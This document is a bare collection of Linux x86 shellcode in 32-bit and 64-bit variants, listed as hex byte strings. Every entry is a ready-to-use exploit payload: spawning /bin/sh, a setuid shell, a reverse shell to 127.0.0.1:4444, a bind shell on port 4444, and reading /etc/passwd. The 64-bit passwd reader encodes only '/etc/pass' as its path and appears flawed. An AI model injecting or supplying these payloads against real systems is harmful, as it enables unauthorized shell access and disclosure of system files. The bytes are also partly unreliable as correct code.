execve /bin/sh
32: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80
64:\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05

execve /bin/sh (setuid)
32: \x31\xdb\x31\xc0\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80
64: \x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05

Reverse shell
32(IP 127.0.0.1, Port 4444): \x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x89\xf3\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
64(IP 127.0.0.1, Port 4444): \x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x2a\x48\x31\xf6\x56\x48\xbe\xfe\xff\xee\xb3\x7f\x00\x00\x01\x48\xf7\xd6\x56\x48\x89\xe6\x6a\x10\x5a\x0f\x05\x48\x31\xc0\x6a\x21\x58\x6a\x02\x5e\x0f\x05\x48\xff\xce\x79\xf6\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05

bind shell:
32(port 4444): \x31\xc0\x31\xdb\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
64(port 4444): \x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\x11\x5c\x66\x6a\x02\x48\x89\xe6\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x6a\x32\x58\x31\xf6\x0f\x05\x48\x31\xc0\x6a\x2b\x58\x31\xf6\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x6a\x21\x58\x6a\x02\x5e\x0f\x05\x48\xff\xce\x79\xf6\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05

readfile: (/etc/passwd)
32: \x31\xc0\x31\xdb\x31\xc9\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x65\x74\x89\xe3\xb0\x05\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\xb2\xff\xcd\x80\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80
64: \x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x53\x48\x89\xe7\x48\x31\xd2\xb0\x02\x0f\x05\x48\x89\xc7\x48\x31\xc0\x48\x89\xe6\x48\x31\xd2\xb2\xff\x0f\x05\x48\x31\xc0\xb0\x01\x48\x31\xff\x40\xb7\x01\x0f\x05\x48\x31\xc0\xb0\x3c\x0f\x05